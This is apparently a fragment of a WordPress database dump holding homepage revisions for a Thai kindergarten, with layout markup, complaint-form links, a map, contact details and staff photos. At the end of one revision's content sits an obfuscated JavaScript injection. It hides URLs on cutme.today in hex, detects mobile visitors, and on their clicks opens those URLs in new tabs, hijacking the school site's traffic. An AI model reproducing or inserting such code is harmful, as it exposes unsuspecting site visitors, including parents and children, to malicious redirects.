7%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:04:58','2024-09-24 04:04:58','',19,'http://watprato.ssk.in.th/?p=416',0,'revision','',0),
(417,2,'2024-09-24 11:05:30','2024-09-24 04:05:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn 